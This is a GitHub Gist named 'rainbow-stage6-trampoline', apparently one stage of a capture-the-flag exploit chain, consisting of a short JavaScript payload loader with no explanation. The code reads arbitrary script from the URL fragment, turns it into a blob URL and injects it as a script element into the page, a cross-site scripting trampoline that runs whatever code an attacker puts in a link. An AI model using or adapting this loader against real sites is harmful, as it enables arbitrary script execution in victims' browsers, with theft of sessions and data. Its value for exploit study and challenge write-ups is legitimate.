Last active
October 1, 2019 10:19
-
-
Save pspaul/e080069c5d86571dd0bd582421403b71 to your computer and use it in GitHub Desktop.
rainbow-stage6-trampoline
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
const payload = decodeURIComponent(location.hash.slice(1)); | |
const blobUrl = URL.createObjectURL(new Blob([payload], { type: 'application/javascript' })); | |
const script = document.createElement('script'); | |
script.src = blobUrl; | |
homepage.appendChild(script); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment